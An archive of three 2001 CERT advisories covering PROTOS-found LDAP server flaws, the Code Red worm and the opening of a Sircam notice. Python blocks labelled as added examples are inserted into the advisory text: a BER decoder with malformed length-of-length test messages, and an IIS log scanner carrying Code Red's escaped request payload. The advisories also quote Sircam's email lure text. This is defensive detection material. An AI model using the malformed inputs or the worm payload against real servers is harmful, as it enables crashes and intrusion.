The LDAP protocol provides access to directories that support the X.500 directory semantics without requiring the additional resources of X.500. A directory is a collection of information such as names, addresses, access control lists, and cryptographic certificates. Because LDAP servers are widely used in maintaining corporate contact information and providing authentication services, any threats to their integrity or stability can jeopardize the security of an organization.

To test the security of protocols like LDAP, the PROTOS project presents a server with a wide variety of sample packets containing unexpected values or illegally formatted data. This approach may reveal vulnerabilities that would not manifest themselves under normal conditions. As a member of the PROTOS project consortium, the Oulu University Secure Programming Group (OUSPG) co-developed and subsequently used the PROTOS LDAPv3 test suite to study several implementations of the LDAP protocol.

The PROTOS LDAPv3 test suite is divided into two main sections: the "Encoding" section, which tests an LDAP server's response to packets that violate the Basic Encoding Rules (BER), and the "Application" section, which tests an LDAP server's response to packets that trigger LDAP-specific application anomalies. Each section is further divided into "groups" that collectively exercise a particular encoding or application feature. Finally, each group contains one or more "test cases," which represent the network packets that are used to test individual exceptional conditions.

By applying the PROTOS LDAPv3 test suite to a variety of popular LDAP-enabled products, the OUSPG revealed the following vulnerabilities:

VU#276944 - iPlanet Directory Server contains multiple vulnerabilities in LDAP handling code

The iPlanet Directory Server contains multiple vulnerabilities in the code that processes LDAP requests. In the encoding section of the test suite, this product had an indeterminate number of failures in the group that tests invalid BER length of length fields. In the application section of the test suite, this product failed four groups and had inconclusive results for an additional five groups. The four failed groups indicate the presence of buffer overflow vulnerabilities. For the inconclusive groups, the product exhibited suspicious behavior while testing for format string vulnerabilities.

VU#505564 - IBM SecureWay Directory is vulnerable to denial-of-service attacks via LDAP handling code

The IBM SecureWay Directory server contains one or more vulnerabilities in the code that processes LDAP requests. These vulnerabilities were discovered independently by IBM using the PROTOS LDAPv3 test suite. The CERT/CC is not currently aware of the nature of these vulnerabilities.

VU#583184 - Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code

The Lotus Domino R5 Server Family (including the Enterprise, Application, and Mail servers) contains multiple vulnerabilities in the code that processes LDAP requests. In the encoding section of the test suite, this product failed 1 of 77 groups. The failed group tests a server's response to miscellaneous packets with semi-valid BER encodings. In the application section of the test suite, this product failed 23 of 77 groups. These results suggest that both buffer overflow and format string vulnerabilities are likely to be present in a variety of application components.

VU#688960 - Teamware Office contains multiple vulnerabilities in LDAP handling code

The Teamware Office suite is packaged with a combination X.500/LDAP server that provides directory services. Multiple versions of the Office product contain vulnerabilities that cause the LDAP server to crash in response to traffic sent by the PROTOS LDAPv3 test suite. In the encoding section of the test suite, this product failed 9 of 16 groups involving invalid encodings for several BER object types. In the application section of the test suite, this product failed 4 of 32 groups. The remaining 45 groups were not exercised during the test runs. The four failed groups indicate the presence of buffer overflow vulnerabilities.

VU#717380 - Potential vulnerabilities in Qualcomm Eudora WorldMail Server LDAP handling code

While investigating the vulnerabilities reported by OUSPG, it was brought to our attention that the Eudora WorldMail Server may contain vulnerabilities that can be triggered via the PROTOS test suite. The CERT/CC has reported this possibility to Qualcomm and an investigation is pending.

VU#763400 - Microsoft Exchange 5.5 LDAP Service is vulnerable to denial-of-service attacks

The Microsoft Exchange 5.5 LDAP Service contains a vulnerability that causes the LDAP server to freeze in response to malformed LDAP requests generated by the PROTOS test suite. This only affects the LDAP service; all other Exchange services, including mail handling, continue normally. Although this product was not included in OUSPG's initial testing, subsequent informal testing revealed that the LDAP service of Microsoft Exchange 5.5 became unresponsive while processing test cases containing exceptional BER encodings for the LDAP filter type field.

VU#765256 - Network Associates PGP Keyserver contains multiple vulnerabilities in LDAP handling code

The Network Associates PGP Keyserver 7.0 contains multiple vulnerabilities in the code that processes LDAP requests. In the encoding section of the test suite, this product failed 12 of 16 groups. In the application section of the test suite, this product failed 1 of 77 groups. The failed group focused on out-of-bounds integer values for the messageID parameter. Due to a peculiarity of this test group, this failure may actually represent an encoding failure.

VU#869184 - Oracle 8i Enterprise Edition contains multiple vulnerabilities in LDAP handling code

The Oracle 8i Enterprise Edition server contains multiple vulnerabilities in the code used to process LDAP requests. In the encoding section of the test suite, this product failed an indeterminate number of test cases in the group that tests a server's response to invalid encodings of BER OBJECT-IDENTIFIER values. In the application section of the test suite, this product failed 46 of 77 groups. These results suggest that both buffer overflow and format string vulnerabilities are likely to be present in a variety of application components.

VU#935800 - Multiple versions of OpenLDAP are vulnerable to denial-of-service attacks

There are multiple vulnerabilities in the OpenLDAP implementations of the LDAP protocol. These vulnerabilities exist in the code that translates network datagrams into application-specific information. In the encoding section of the test suite, this product failed the group that tests the handling of invalid BER length of length fields. In the application section of the test suite, this product passed all 6685 test cases.

Additional Information

For the most up-to-date information regarding these vulnerabilities, please visit the CERT/CC Vulnerability Notes Database at:
http://www.kb.cert.org/vuls/

Please note that the test results summarized above should not be interpreted as a statement of overall software quality. However, the CERT/CC does believe that these results are useful in describing the characteristics of these vulnerabilities. For example, an application that fails multiple groups indicates that problems exist in different areas of the code, rather than in a specific code segment.

II. Impact

VU#276944 - iPlanet Directory Server contains multiple vulnerabilities in LDAP handling code

One or more of these vulnerabilities allow a remote attacker to execute arbitrary code with the privileges of the Directory Server. The server typically runs with system privileges. At least one of these vulnerabilities has been successfully exploited in a laboratory environment under Windows NT 4.0, but they may affect other platforms as well.

VU#505564 - IBM SecureWay Directory is vulnerable to denial-of-service attacks via LDAP handling code

These vulnerabilities allow a remote attacker to crash affected SecureWay Directory servers, resulting in a denial-of-service condition. It is not known at this time whether these vulnerabilities will allow a remote attacker to execute arbitrary code. These vulnerabilities exist on the Solaris and Windows 2000 platforms but are not present under Windows NT, AIX, and AIX with SSL.

VU#583184 - Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code

One or more of these vulnerabilities allow a remote attacker to execute arbitrary code with the privileges of the Domino server. The server typically runs with system privileges. At least one of these vulnerabilities has been successfully exploited in a laboratory environment.

VU#688960 - Teamware Office contains multiple vulnerabilities in LDAP handling code

These vulnerabilities allow a remote attacker to crash affected Teamware LDAP servers, resulting in a denial-of-service condition. They may also allow a remote attacker to execute arbitrary code with the privileges of the Teamware server. The server typically runs with system privileges.

VU#717380 - Potential vulnerabilities in Qualcomm Eudora WorldMail Server LDAP handling code

The CERT/CC has not yet determined the impact of this vulnerability.

VU#763400 - Microsoft Exchange 5.5 LDAP Service is vulnerable to denial-of-service attacks

This vulnerability allows a remote attacker to crash the LDAP component of vulnerable Exchange 5.5 servers, resulting in a denial-of-service condition within the LDAP component.

VU#765256 - Network Associates PGP Keyserver contains multiple vulnerabilities in LDAP handling code

One or more of these vulnerabilities allow a remote attacker to execute arbitrary code with the privileges of the Keyserver. The server typically runs with system privileges. At least one of these vulnerabilities has been successfully exploited in a laboratory environment.

VU#869184 - Oracle 8i Enterprise Edition contains multiple vulnerabilities in LDAP handling code

One or more of these vulnerabilities allow a remote attacker to execute arbitrary code with the privileges of the Oracle server. The server typically runs with system privileges. At least one of these vulnerabilities has been successfully exploited in a laboratory environment.

VU#935800 - Multiple versions of OpenLDAP are vulnerable to denial-of-service attacks

These vulnerabilities allow a remote attacker to crash affected OpenLDAP servers, resulting in a denial-of-service condition.

III. Solution

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. Please consult this appendix to determine if you need to contact your vendor directly.

Block access to directory services at network perimeter

As a temporary measure, it is possible to limit the scope of these vulnerabilities by blocking access to directory services at the network perimeter. Please note that this workaround does not protect vulnerable products from internal attacks.

   ldap    389/tcp   # Lightweight Directory Access Protocol
   ldap    389/udp   # Lightweight Directory Access Protocol
   ldaps   636/tcp   # ldap protocol over TLS/SSL (was sldap)
   ldaps   636/udp   # ldap protocol over TLS/SSL (was sldap)

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

IBM Corporation

IBM and Tivoli are currently investigating the details of the vulnerabilities in the various versions of the SecureWay product family. Fixes are being implemented as these details become known. Fixes will be posted to the download sites (IBM or Tivoli) for the affected platform. See http://www-1.ibm.com/support under "Server Downloads" or "Software Downloads" for links to the fix distribution sites.

iPlanet E-Commerce Solutions

[CERT/CC Addendum: These vulnerabilities were originally discovered in Directory Server 5.0 Beta and were later found to exist in versions up to and including version 4.13. These vulnerabilities have been addressed in the released version of Directory Server 5.0.]

Lotus Development Corporation

Lotus reproduced the problem as reported by OUSPG and documented it in SPR#DWUU4W6NC8. Lotus considers security issues as top priority, so we acted quickly to resolve the problem in a maintenance update to Domino. It was addressed in Domino R5.0.7a, which was released on May 18th, 2001. This release can be downloaded from Notes.net at http://www.notes.net/qmrdown.nsf/qmrwelcome. The fix is documented in the fix list at http://www.notes.net/r5fixlist.nsf/Search!SearchView&Query=DWUU4W6NC8

Microsoft Corporation

Microsoft is developing a hotfix for this issue which will be available shortly. Customers can obtain this hotfix by contacting Product Support Services at no charge and asking for Q303448 and Q303450. Information on contacting Microsoft Product Support Services can be found at http://www.microsoft.com/support/

Network Associates, Inc.

Network Associates has resolved these vulnerabilities in Hotfix 2 for both Solaris and Windows NT. All Network Associates Enterprise Support customers have been notified and have been provided access to the Hotfix. This Hotfix can be downloaded at http://www.pgp.com/downloads/default.asp

The OpenLDAP Project

[CERT/CC Addendum: To address these vulnerabilities, the OpenLDAP Project has released OpenLDAP 1.2.12 for use in LDAPv2 environments and OpenLDAP 2.0.8 for use in LDAPv3 environments. The CERT/CC recommends that users of OpenLDAP contact their software vendor or obtain the latest version, available at http://www.openLDAP.org/software/download/.]

QUALCOMM Incorporated

The LDAP service in WorldMail may be vulnerable to this exploit, but our tests so far have been inconclusive. At this time, we strongly urge all WorldMail customers to ensure that the LDAP service is not accessible from outside their organization nor by untrusted users.

The Teamware Group

An issue has been discovered with Teamware Office Enterprise Directory (LDAP server) that shows an abnormal termination or loop when the LDAP server encounters maliciously or incorrectly created LDAP request data. If the maliciously formatted LDAP request data is requested, the LDAP server may excessively copy the LDAP request data to the stack area. This overflow is likely to cause execution of malicious code. In other cases, the LDAP server may go into abnormal termination or an infinite loop.

[CERT/CC Addendum: Teamware has provided additional documentation of these issues in their "Teamware Solution Database," available at http://support.teamw.com/Online/s_database1.shtml. Registered users can find information on these vulnerabilities by searching for document #010703-0000 for Windows NT or document #010703-0001 for Solaris.]

Appendix B. - Supplemental Information

The PROTOS Project

The PROTOS project is a research partnership between the University of Oulu and VTT Electronics, an independent research organization owned by the Finnish government. The project studies methods by which protocol implementations can be tested for information security defects. Although the vulnerabilities discussed in this advisory relate specifically to the LDAP protocol, the methodology used to research, develop, and deploy the PROTOS LDAPv3 test suite can be applied to any communications protocol. For more information on the PROTOS project and its collection of test suites, please visit
http://www.ee.oulu.fi/research/ouspg/protos/

ASN.1 and the BER

Abstract Syntax Notation One (ASN.1) is a flexible notation that allows one to define a variety of data types. The Basic Encoding Rules (BER) describe how to represent or encode the values of each ASN.1 type as a string of octets. This allows programmers to encode and decode data for platform-independent transmission over a network.

References

The following is a list of URLs referenced in this advisory as well as other useful sources of information:

http://www.cert.org/advisories/CA-2001-18.html
http://www.ietf.org/rfc/rfc2116.txt
http://www.ietf.org/rfc/rfc2251.txt
http://www.ietf.org/rfc/rfc2252.txt
http://www.ietf.org/rfc/rfc2253.txt
http://www.ietf.org/rfc/rfc2254.txt
http://www.ietf.org/rfc/rfc2255.txt
http://www.ietf.org/rfc/rfc2256.txt
http://www.ee.oulu.fi/research/ouspg/protos/
http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/
http://www.kb.cert.org/vuls/
http://www.kb.cert.org/vuls/id/276944
http://www.kb.cert.org/vuls/id/505564
http://www.kb.cert.org/vuls/id/583184
http://www.kb.cert.org/vuls/id/688960
http://www.kb.cert.org/vuls/id/717380
http://www.kb.cert.org/vuls/id/763400
http://www.kb.cert.org/vuls/id/765256
http://www.kb.cert.org/vuls/id/869184
http://www.kb.cert.org/vuls/id/935800

_________________________________________________________________

The CERT Coordination Center thanks the Oulu University Secure Programming Group for reporting these vulnerabilities to us, for their detailed technical analyses, and for their assistance in preparing this advisory. We also thank the many vendors who provided feedback regarding their respective vulnerabilities.

_________________________________________________________________

Authors: Jeffrey P. Lanza and Cory F. Cohen. Feedback on this advisory is greatly appreciated.
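The "invalid BER length of length" group that iPlanet and OpenLDAP failed above, and the ASN.1/BER summary in Appendix B, both concern the same few octets: the ones that say how many octets follow. As an added example (this is not code from the advisory, from OUSPG, or from the PROTOS test suite), the following Python implements a strict BER tag-length-value decoder for an LDAPv3 simple BindRequest and then feeds it a handful of constructed length-of-length mutations written in the spirit of that PROTOS group. The tag values (0x30 SEQUENCE, 0x02 INTEGER, 0x04 OCTET STRING, 0x60 for [APPLICATION 0] BindRequest, 0x80 for the [0] simple credentials) follow RFC 2251; the 4-octet cap on long-form lengths and the rejection of indefinite length are this example's own policy choices, and the sample bind name and password are made up.

```python
"""Strict BER TLV decoding for an LDAPMessage, run against constructed
'invalid length of length' cases in the spirit of the PROTOS encoding group."""
from __future__ import annotations

MAX_LENGTH_OCTETS = 4  # this example's policy: refuse lengths wider than 32 bits


class BerError(ValueError):
    """Any encoding the decoder refuses to process."""


def read_length(buf: bytes, pos: int) -> tuple[int, int]:
    """Decode a BER length at buf[pos] -> (length, next_pos), bounds-checking
    before every read so a hostile length-of-length octet cannot over-read."""
    if pos >= len(buf):
        raise BerError("truncated: no length octet")
    first, pos = buf[pos], pos + 1
    if first < 0x80:                       # short form: the octet is the length
        return first, pos
    if first == 0x80:                      # indefinite form
        raise BerError("indefinite length is not allowed in an LDAPMessage")
    if first == 0xFF:                      # reserved by X.690
        raise BerError("reserved length octet 0xFF")
    n = first & 0x7F                       # long form: n length octets follow
    if n > MAX_LENGTH_OCTETS:
        raise BerError(f"length of length {n} exceeds {MAX_LENGTH_OCTETS} octets")
    if pos + n > len(buf):
        raise BerError(f"truncated: {n} length octets declared, {len(buf) - pos} remain")
    return int.from_bytes(buf[pos:pos + n], "big"), pos + n


def read_tlv(buf: bytes, pos: int = 0) -> tuple[int, bytes, int]:
    """Decode one tag-length-value at buf[pos] -> (tag, value, next_pos)."""
    if pos >= len(buf):
        raise BerError("truncated: no tag octet")
    tag, pos = buf[pos], pos + 1
    if tag & 0x1F == 0x1F:
        raise BerError("high-tag-number form is not used by LDAP")
    length, pos = read_length(buf, pos)
    if length > len(buf) - pos:            # the check a memcpy-into-fixed-buffer decoder lacks
        raise BerError(f"declared length {length} exceeds the {len(buf) - pos} octets remaining")
    return tag, buf[pos:pos + length], pos + length


def expect(buf: bytes, pos: int, want: int) -> tuple[bytes, int]:
    tag, value, pos = read_tlv(buf, pos)   # read_tlv, but require a specific tag
    if tag != want:
        raise BerError(f"expected tag 0x{want:02x}, got 0x{tag:02x}")
    return value, pos


def parse_bind_request(msg: bytes) -> dict:
    """Parse LDAPMessage { messageID, BindRequest with simple credentials } (RFC 2251 tags)."""
    body, end = expect(msg, 0, 0x30)                    # LDAPMessage ::= SEQUENCE
    if end != len(msg):
        raise BerError("trailing octets after LDAPMessage")
    mid, pos = expect(body, 0, 0x02)                    # messageID INTEGER (0 .. maxInt)
    if not 1 <= len(mid) <= 4 or mid[0] & 0x80:
        raise BerError("messageID must be a non-negative INTEGER of 1..4 octets")
    op, _ = expect(body, pos, 0x60)                     # [APPLICATION 0] BindRequest
    version, p = expect(op, 0, 0x02)
    name, p = expect(op, p, 0x04)                       # LDAPDN as OCTET STRING
    password, _ = expect(op, p, 0x80)                   # [0] simple credentials
    if len(version) != 1:
        raise BerError("bad LDAP version")
    return {"messageID": int.from_bytes(mid, "big"), "version": version[0],
            "name": name.decode("utf-8", "replace"), "password": password}


def tlv(tag: int, value: bytes) -> bytes:
    n = len(value)                         # minimal length encoding, as a well-behaved client sends
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def bind_request(message_id: int, name: bytes, password: bytes) -> bytes:
    """Build a well-formed LDAPv3 simple BindRequest (messageID < 128)."""
    op = tlv(0x02, b"\x03") + tlv(0x04, name) + tlv(0x80, password)
    return tlv(0x30, tlv(0x02, bytes([message_id])) + tlv(0x60, op))


def length_of_length_cases(valid: bytes) -> dict[str, bytes]:
    """This example's own mutations of a valid message's length octets (not PROTOS cases)."""
    if valid[0] != 0x30 or valid[1] >= 0x80:
        raise ValueError("expects a short-form outer length")
    body, n = valid[2:], len(valid) - 2
    return {
        "indefinite_form":       bytes([0x30, 0x80]) + body,
        "reserved_0xFF":         bytes([0x30, 0xFF]) + body,
        "eight_length_octets":   bytes([0x30, 0x88]) + n.to_bytes(8, "big") + body,  # legal BER, over policy
        "length_octets_missing": bytes([0x30, 0x84]) + n.to_bytes(2, "big"),         # claims 4, sends 2
        "length_past_end":       bytes([0x30, 0x84]) + b"\xff\xff\xff\xff" + body,
        # outer length right; inner messageID claims 2**31-1 octets (body[3:] skips "02 01 id")
        "nested_messageID":      tlv(0x30, b"\x02\x84\x7f\xff\xff\xff" + body[3:]),
    }


def fuzz_report(valid: bytes) -> dict[str, str]:
    """Case name -> rejection reason; an empty string would mean the parser accepted it."""
    report = {}
    for name, case in length_of_length_cases(valid).items():
        try:
            parse_bind_request(case)
            report[name] = ""
        except BerError as exc:
            report[name] = str(exc)
    return report
```

The line that matters is the comparison of the declared length against the octets actually remaining in read_tlv, together with the refusal to consume a long-form length whose octets are not all present. A decoder that trusts the declared length and copies that many octets into a fixed stack buffer is the pattern the overflow findings above describe; a decoder that accepts 0xFF or a 126-octet length of length and then indexes past the datagram is the pattern behind the crashes. Calling fuzz_report(bind_request(1, b"cn=admin,dc=example,dc=com", b"secret")) gives a non-empty reason for every case, which is the only acceptable outcome for this group.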
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-18.html

______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
   CERT Coordination Center
   Software Engineering Institute
   Carnegie Mellon University
   Pittsburgh PA 15213-3890
   U.S.A.

CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

   subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

Revision History
Jul 16, 2001: Initial release

Date: Thu, 19 Jul 2001 19:19:03 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-19

CERT Advisory CA-2001-19 "Code Red" Worm Exploiting Buffer Overflow In IIS Indexing Service DLL

Original release date: July 19, 2001
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

Systems running Microsoft Windows NT 4.0 and Windows 2000 with IIS 4.0 or IIS 5.0 enabled

Overview

The CERT/CC has received reports of new self-propagating malicious code that exploits certain configurations of Microsoft Windows susceptible to the vulnerability described in CERT advisory CA-2001-13 Buffer Overflow In IIS Indexing Service DLL. These reports indicate that the "Code Red" worm may have already affected as many as 225,000 hosts, and continues to spread rapidly.

Description

In examples we have seen, the "Code Red" worm attack proceeds as follows:

* The victim host is scanned for TCP port 80 by the "Code Red" worm.
* The attacking host sends a crafted HTTP GET request to the victim, attempting to exploit a buffer overflow in the Indexing Service described in CERT advisory CA-2001-13.
* If the exploit is successful, the worm begins executing on the victim host. Initially, the existence of the c:\notworm file is checked. Should this file be found, the worm ceases execution.
* If c:\notworm is not found, the worm begins spawning threads to scan seemingly random IP addresses for hosts listening on TCP port 80, exploiting any vulnerable hosts it finds.
* If the victim host's default language is English, then after 100 scanning threads have started and a certain period of time has elapsed following infection, all web pages served by the victim host are defaced with the message

     HELLO! Welcome to http://www.worm.com! Hacked By Chinese!

* If the victim host's default language is not English, the worm will continue scanning but no defacement will occur.

System Footprint

The "Code Red" worm can be identified on victim machines by the presence of the following string in IIS log files:

   /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
   NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
   NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
   NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
   u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
   b%u53ff%u0078%u0000%u00=a

Additionally, web pages on victim machines may be defaced with the following message:

   HELLO! Welcome to http://www.worm.com! Hacked By Chinese!

The text of this page is stored exclusively in memory and is not written to disk. Therefore, searching for the text of this page in the file system may not detect compromise.

Network Footprint

A host running an active instance of the "Code Red" worm scans random IP addresses on port 80/TCP looking for other hosts to infect.

Additional detailed analysis of this worm has been published by eEye Digital Security at http://www.eeye.com.

Impact

In addition to web site defacement, infected systems may experience performance degradation as a result of the scanning activity of this worm. Non-compromised systems and networks that are being scanned by other hosts infected by the "Code Red" worm may experience severe denial of service. This occurs because each instance of the "Code Red" worm uses the same random number generator seed to create the list of IP addresses it scans. Therefore, all victim hosts scan the same IP addresses.
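Because the defacement page lives only in memory, the request string in the IIS log is the footprint a responder can actually search for. As an added example (not code from the advisory or from eEye), the following Python scans IIS W3C extended log lines for that signature. It generalizes the advisory's string in one respect: it captures whichever filler character precedes the %u escapes instead of assuming 'N', so a request that differs only in the filler byte is still reported, and it decodes the %uXXXX escapes into the UTF-16LE bytes the Indexing Service would have placed in memory so the 0x90 bytes at the front of the payload are visible. The log lines are constructed, not real data; the fifth line's 'X' filler is an assumed variant, and the client IPs are documentation addresses.

```python
"""Scan IIS log lines for the Code Red request signature from CA-2001-19."""
from __future__ import annotations
import re
from dataclasses import dataclass

# '/default.ida' then a run of at least 100 copies of one filler character and
# then %uXXXX escapes. The advisory's string uses 'N'; the filler is captured
# rather than assumed, so a variant with another filler byte is still caught.
SIGNATURE = re.compile(
    r"/default\.ida[?\s]?(?P<pad>(?P<fill>[A-Za-z])(?P=fill){99,})"
    r"(?P<payload>(?:%u[0-9a-fA-F]{4})+)",
    re.IGNORECASE,
)
CLIENT_IP = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


@dataclass
class Hit:
    line_no: int
    client_ip: str
    filler: str
    run_length: int
    escapes: int
    shellcode: bytes      # the %u escapes decoded to the bytes IIS would hold in memory


def decode_u_escapes(payload: str) -> bytes:
    """%uXXXX is a UTF-16 code unit; on x86 it lands in memory little-endian."""
    units = re.findall(r"%u([0-9a-fA-F]{4})", payload)
    return b"".join(int(u, 16).to_bytes(2, "little") for u in units)


def scan_iis_log(text: str) -> list[Hit]:
    """Return one Hit per log line carrying the signature; '#' lines are W3C headers."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        m = SIGNATURE.search(line)
        if not m:
            continue
        ip = CLIENT_IP.search(line)
        code = decode_u_escapes(m.group("payload"))
        hits.append(Hit(line_no, ip.group(1) if ip else "?", m.group("fill"),
                        len(m.group("pad")), len(code) // 2, code))
    return hits


# Constructed sample (not real log data): W3C extended format, with the
# advisory's query string on the third line and an assumed variant that uses
# a different filler byte on the fifth.
CODE_RED_QUERY = "N" * 224 + (
    "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
)
SAMPLE_LOG = "\n".join([
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-07-19 10:15:01 192.0.2.10 GET /default.htm - 200",
    f"2001-07-19 10:15:07 198.51.100.7 GET /default.ida {CODE_RED_QUERY} 200",
    "2001-07-19 10:16:30 192.0.2.11 GET /default.ida q=test 404",
    f"2001-07-19 10:17:02 203.0.113.9 GET /default.ida {'X' * 224}%u9090%u6858%ucbd3%u7801 200",
])

if __name__ == "__main__":
    for h in scan_iis_log(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.client_ip} filler={h.filler!r}x{h.run_length} "
              f"escapes={h.escapes} first bytes={h.shellcode[:8].hex()}")
```

On the sample, the third and fifth lines are reported and the benign /default.ida request with a short query is not. The decoded payload of the advisory's string begins 90 90 58 68 d3 cb 01 78: two x86 NOP bytes followed by what reads as an address-sized constant, which is what one expects at the start of an overflow payload and is a useful sanity check that a match is the real thing rather than a long but harmless query. The trailing %u00=a is not a complete escape and is left undecoded.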
   Furthermore, it is important to note that while the "Code Red" worm appears to merely deface web pages on affected systems and attack other systems, the IIS indexing vulnerability it exploits can be used to execute arbitrary code in the Local System security context. This level of privilege effectively gives an attacker complete control of the victim system.

Solutions

   The CERT/CC encourages all Internet sites to review CERT advisory CA-2001-13 and ensure workarounds or patches have been applied on all affected hosts on your network.

   If you believe a host under your control has been compromised, you may wish to refer to

   http://www.cert.org/tech_tips/win-UNIX-system_compromise.html

Reporting

   The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to cert@cert.org with the following text included in the subject line: "[CERT#36881]".
______________________________________________________________________

   Author(s): Roman Danyliw and Allen Householder
______________________________________________________________________

   This document is available from:
   http://www.cert.org/advisories/CA-2001-19.html
______________________________________________________________________

CERT/CC Contact Information

   Email: cert@cert.org
   Phone: +1 412-268-7090 (24-hour hotline)
   Fax: +1 412-268-6989
   Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.

   CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

   We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

   http://www.cert.org/CERT_PGP.key

   If you prefer to use DES, please call the CERT hotline for more information.
Getting security information

   CERT publications and other security information are available from our web site

   http://www.cert.org/

   To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

   subscribe cert-advisory

   * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
______________________________________________________________________

NO WARRANTY

   Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
_________________________________________________________________

   Conditions for use, disclaimers, and sponsorship information

   Copyright 2001 Carnegie Mellon University.
Revision History

   Jul 19, 2001: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBO1dohAYcfu8gsZJZAQGazQP/YSiWvPHNreLfTIBPp0JwM0KpJJ3Lif5y
BtF1G+EuE9tN+PQwF4HO4gC3h02VmJDb02IKMtiHTQxldN7fkzzodcjK7dNpc20x
YlNC/ez0XKpy+TRKNB9Rw/l/d+vglMRL5nt8ZaKocaGO7z1AYz8spVmhLnjXg3sU
kS2E8WJf38w=
=Ox7X
-----END PGP SIGNATURE-----

From - Wed Jul 25 14:16:12 2001
Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f6PLCPk10456; Wed, 25 Jul 2001 14:12:25 -0700 (PDT)
Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA26035; Wed, 25 Jul 2001 14:39:58 -0400 (EDT)
Date: Wed, 25 Jul 2001 14:39:58 -0400 (EDT)
Received: by canaveral.red.cert.org; Wed, 25 Jul 2001 14:34:41 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Post: NO (posting not allowed on this list)
Subject: CERT Advisory CA-2001-22

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-22 W32/Sircam Malicious Code

   Original release date: July 25, 2001
   Last revised: --
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

     * Microsoft Windows (all versions)

Overview

   "W32/Sircam" is malicious code that spreads through email and potentially through unprotected network shares. Once the malicious code has been executed on a system, it may reveal or delete sensitive information.

   As of 10:00EST(GMT-4) Jul 25, 2001 the CERT/CC has received reports of W32/Sircam from over 300 individual sites.

I. Description

   W32/Sircam can infect a machine in one of two ways:

     * When executed by opening an email attachment containing the malicious code
     * By copying itself into unprotected network shares

   Propagation Via Email

   The virus can appear in an email message written in either English or Spanish with a seemingly random subject line. All known versions of W32/Sircam use the following format in the body of the message:

   English

          Hi! How are you?
          [middle line]
          See you later. Thanks

   Spanish

          Hola como estas ?
          [middle line]
          Nos vemos pronto, gracias.
   Where [middle line] is one of the following:

   English

          I send you this file in order to have your advice
          I hope you like the file that I sendo you
          I hope you can help me with this file that I send
          This is the file with the information you ask for

   Spanish

          Te mando este archivo para que me des tu punto de vista
          Espero te guste este archivo que te mando
          Espero me puedas ayudar con el archivo que te mando
          Este es el archivo con la informacion que me pediste

